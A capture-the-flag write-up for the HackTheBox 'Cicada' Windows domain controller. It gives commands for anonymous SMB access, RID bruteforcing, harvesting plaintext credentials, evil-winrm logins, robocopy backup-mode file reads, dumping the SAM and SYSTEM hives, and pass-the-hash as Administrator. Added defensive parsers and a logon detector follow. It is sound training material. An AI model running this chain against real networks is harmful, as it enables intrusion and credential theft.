HackTheBox Cicada Writeup
Dive into the depths of cybersecurity with the Cicada Capture The Flag (CTF) challenge, an easy-level test of skill designed for seasoned professionals. This intense CTF writeup guides you through advanced techniques and complex vulnerabilities, pushing your expertise to the limit.
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.11.35 cicada.htb
Script to add hosts automatically
#!/usr/bin/env bash
# Append the lab host to /etc/hosts unless an identical entry is already present.
ip="10.10.11.35"
domain="cicada.htb"
grep -qF "$ip $domain" /etc/hosts || printf '%s %s\n' "$ip" "$domain" | sudo tee -a /etc/hosts >/dev/null
Mapping
nmap -sCV cicada.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-02 22:04 CEST
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.39% done; ETC: 22:05 (0:00:00 remaining)
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.051s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-03T03:05:32
|_ start_date: N/A
|_clock-skew: 7h00m00s
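Two details in the scan above matter for everything that follows: the domain controller's clock is 7 hours off the scanning host (Kerberos rejects requests outside a 5-minute window by default), and SMB signing is required. The parser below, an added example that is not part of the original writeup, reads nmap's normal output, extracts the open ports, the clock skew and the SMB signing state, and turns them into assessor notes. The embedded scan text is a trimmed copy of the output above; the Kerberos tolerance and the list of domain-controller ports are general facts, not something taken from the page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Trimmed copy of the nmap output shown above, embedded so the example runs offline.
SAMPLE_NMAP = """\
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")

KERBEROS_MAX_SKEW_SECONDS = 5 * 60  # default tolerance enforced by the KDC


@dataclass
class ScanSummary:
    host: str = ""
    open_ports: Dict[int, str] = field(default_factory=dict)  # port -> service name
    clock_skew_seconds: Optional[int] = None
    smb_signing_required: bool = False


def parse_nmap(text: str) -> ScanSummary:
    """Extract host, open ports, clock skew and SMB signing state from nmap normal output."""
    summary = ScanSummary()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Nmap scan report for "):
            summary.host = line[len("Nmap scan report for "):]
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            summary.open_ports[int(m.group(1))] = m.group(4)
            continue
        m = SKEW_RE.search(line)
        if m:
            sign, h, mi, s = m.groups()
            total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
            summary.clock_skew_seconds = -total if sign else total
        if "Message signing enabled and required" in line:
            summary.smb_signing_required = True
    return summary


def assess(summary: ScanSummary) -> List[str]:
    """Turn the parsed scan into the notes an assessor would record."""
    findings: List[str] = []
    skew = summary.clock_skew_seconds
    if 88 in summary.open_ports and skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS:
        hours, rem = divmod(abs(skew), 3600)
        findings.append(
            f"Kerberos clock skew of {hours}h{rem // 60:02d}m exceeds the "
            f"{KERBEROS_MAX_SKEW_SECONDS // 60}-minute tolerance; the KDC rejects requests "
            "from a client with this offset, so sync time before any Kerberos authentication")
    if 445 in summary.open_ports:
        if summary.smb_signing_required:
            findings.append("SMB signing required: the hardened setting, SMB sessions cannot be relayed")
        else:
            findings.append("SMB signing not required: SMB sessions could be relayed to this host")
    if 5985 in summary.open_ports:
        findings.append("WinRM (5985/tcp) reachable from the scanning network; "
                        "restrict it to management hosts")
    dc_ports = sorted({53, 88, 389, 636, 3268, 3269} & set(summary.open_ports))
    if dc_ports:
        findings.append("Domain-controller services exposed on ports " + ", ".join(map(str, dc_ports)))
    return findings


if __name__ == "__main__":
    for note in assess(parse_nmap(SAMPLE_NMAP)):
        print("-", note)
```

The skew is reported in seconds so it can be compared directly with the KDC tolerance; a negative value means the target's clock is behind the scanner's.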
1. Enumerate SMB Shares Using smbclient
smbclient -L //10.10.11.35
- Lists available SMB shares on the target machine.
2. Access the HR Share with SMBv2
smbclient //10.10.11.35/HR -U '' -m SMB2
- Anonymous login to the HR share, forcing the SMBv2 protocol.
3. Read Notice from HR.txt for Credentials
more "Notice from HR.txt"
- Use more to read the Notice from HR.txt file, which contains credentials for the user michael.wrightson.
4. Enumerate Users via RID Bruteforce Using netexec
netexec smb --rid-brute -u guest -p '' -t 10 10.10.11.35
- Perform a RID bruteforce against the SMB server using the guest account. -t 10 increases the thread count for faster scanning.
5. Further Enumeration Using enum4linux
enum4linux-ng -u michael.wrightson -p '<password_from_notice_file>' -A 10.10.11.35 -d
- Run enum4linux-ng to gather detailed SMB information. One of the users found is:
'1108':
  username: david.orelious
  name: (null)
  acb: '0x00000210'
  description: Just in case I forget my password is [REDACTED]
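Steps 1 to 4 all ride on unauthenticated access: an anonymous share listing, a null session to HR, and a RID bruteforce as guest with an empty password. On a domain that disables Guest and rejects null sessions none of that works, and where it does work it leaves a distinctive trace. The detector below is an added example, not part of the original writeup: it runs over records shaped like Windows Security event 4624 (successful logon) and flags each network logon (logon type 3) by ANONYMOUS LOGON or Guest, then raises a high-severity alert when several arrive from one source within a short window, the shape a share listing followed by RID cycling produces. The events, the timestamps and the source address 10.10.14.7 are constructed for the example; the field names are those of the real event.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed records in the shape of Windows Security event 4624 fields. The timestamps,
# the source address 10.10.14.7 and the sequence are made up for this example; they are
# not logs captured from the lab machine.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:10Z", "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "LogonType": 3, "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:12Z", "TargetUserName": "Guest",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:14Z", "TargetUserName": "Guest",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:16Z", "TargetUserName": "Guest",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:18Z", "TargetUserName": "Guest",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:04:20Z", "TargetUserName": "Guest",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
    # An authenticated domain user logging on over the network is not flagged.
    {"EventID": 4624, "TimeCreated": "2024-10-03T03:20:00Z", "TargetUserName": "michael.wrightson",
     "TargetDomainName": "CICADA", "LogonType": 3, "IpAddress": "10.10.14.7"},
]

UNAUTHENTICATED_ACCOUNTS = {"anonymous logon", "guest"}
NETWORK_LOGON = 3  # logon type 3: SMB and other network logons


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_null_and_guest_sessions(events: List[dict], window_seconds: int = 60,
                                   burst_threshold: int = 5) -> List[dict]:
    """Return alerts for unauthenticated network logons.

    Every null-session or Guest network logon yields a 'medium' alert. If at least
    burst_threshold of them come from one source within window_seconds, one extra
    'high' alert is raised for that source (an enumeration burst).
    """
    alerts: List[dict] = []
    per_source: Dict[str, List[datetime]] = defaultdict(list)

    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != NETWORK_LOGON:
            continue
        account = ev.get("TargetUserName", "").lower()
        if account not in UNAUTHENTICATED_ACCOUNTS:
            continue
        src = ev.get("IpAddress", "-")
        per_source[src].append(_ts(ev["TimeCreated"]))
        alerts.append({"severity": "medium", "source": src, "account": account,
                       "time": ev["TimeCreated"],
                       "reason": "unauthenticated network logon (null or Guest session)"})

    window = timedelta(seconds=window_seconds)
    for src, times in per_source.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # Advance the window start until it spans at most window_seconds.
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= burst_threshold:
                alerts.append({"severity": "high", "source": src, "account": "*",
                               "time": times[start].strftime("%Y-%m-%dT%H:%M:%SZ"),
                               "reason": f"{count} unauthenticated logons within "
                                         f"{window_seconds}s: enumeration burst"})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_null_and_guest_sessions(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["source"], alert["account"], alert["reason"])
```

The medium alerts are the audit trail; the single high alert per source is what is worth paging on. The matching hardening is to keep the Guest account disabled and to disallow anonymous SAM and share enumeration through policy, after which the RID bruteforce in step 4 fails outright.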
6. Access DEV Share Using smbclient
smbclient -U david.orelious //10.10.11.35/DEV
- Navigate the DEV share and find Backup_script.ps1.
more Backup_script.ps1
- This reveals credentials for the user emily.oscars.
7. Log in to the System Using evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
- Use the credentials from Backup_script.ps1 to log in with evil-winrm.
8. Retrieve the user.txt Flag
type ../Desktop/user.txt
- Read the user.txt flag on the desktop of emily.oscars.
9. Privilege Escalation Using robocopy
robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B
- Copy root.txt from the Administrator's desktop to the public directory using robocopy with the /B (backup mode) flag to bypass file permissions.
10. Read the root.txt Flag
type C:\Users\Public\root.txt
- Display the root.txt flag.
Beyond Root with NT Admin Shell
- Log back into the system using evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
- Check Privileges in the Current Session
whoami /priv
- Dump the SAM and SYSTEM Registry Files
reg save hklm\sam sam
reg save hklm\system system
dir
- This saves the sam and system registry hives to the current directory.
- Download SAM and SYSTEM Files
download sam
download system
- Extract NTLM hashes using Impacket's secretsdump
impacket-secretsdump -sam sam -system system LOCAL
- Extract the NTLM hash:
Administrator:500:aad3b43....35b51404ee:[REDACTED_HASH]:::
- Log in as Administrator Using the NTLM Hash
evil-winrm -u 'Administrator' -H '<Admin-Hash>' -i cicada.htb
- Use the Administrator NTLM hash to gain full access to the system.
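Step 9 and the Beyond Root section succeed for the same reason: robocopy /B and reg save of the SAM and SYSTEM hives both need SeBackupPrivilege, which lets a process read any file or hive regardless of its ACL. That is what the whoami /priv check above is for, and on a domain controller the privilege (granted by default to Backup Operators) is equivalent to full control. The parser below is an added example, not code from the original writeup: it reads whoami /priv output and lists the privileges an auditor treats as high risk. The output text is constructed in the layout Windows prints, on the assumption that emily.oscars holds SeBackupPrivilege as the robocopy and reg save steps imply; the page itself does not show her privilege list.

```python
from typing import Dict, List, Tuple

# Constructed `whoami /priv` output in the layout Windows prints. The lines were written
# for this example and are not captured from the lab machine.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges whose holders can read or write past DACLs or otherwise reach SYSTEM,
# with the reason an auditor cares about each one.
HIGH_RISK_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (backup-mode copies, registry hive saves)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "read and modify the memory of any process",
    "SeImpersonatePrivilege": "impersonate any client that connects to the process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}


def parse_whoami_priv(text: str) -> Dict[str, Tuple[str, str]]:
    """Map privilege name -> (description, state) from `whoami /priv` output."""
    privileges: Dict[str, Tuple[str, str]] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True  # the table body starts after the '=====' ruler
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # First token is the privilege name, last is the state, the rest is the description.
        name, state, description = parts[0], parts[-1], " ".join(parts[1:-1])
        privileges[name] = (description, state)
    return privileges


def audit_privileges(privileges: Dict[str, Tuple[str, str]]) -> List[str]:
    """List the high-risk privileges present in the token.

    A 'Disabled' state is still reported: the privilege is in the token and any
    process the user runs can enable it, so only its absence removes the risk.
    """
    findings: List[str] = []
    for name, (_description, state) in privileges.items():
        if name in HIGH_RISK_PRIVILEGES:
            findings.append(f"{name} ({state}): {HIGH_RISK_PRIVILEGES[name]}")
    return findings


if __name__ == "__main__":
    for finding in audit_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print("-", finding)
```

The remediation is a group review rather than a file-permission fix: an account that only needs to read a share should not be in Backup Operators or any other group that hands out SeBackupPrivilege on a domain controller, and Protected Users or similar tiering keeps such accounts off the DC entirely.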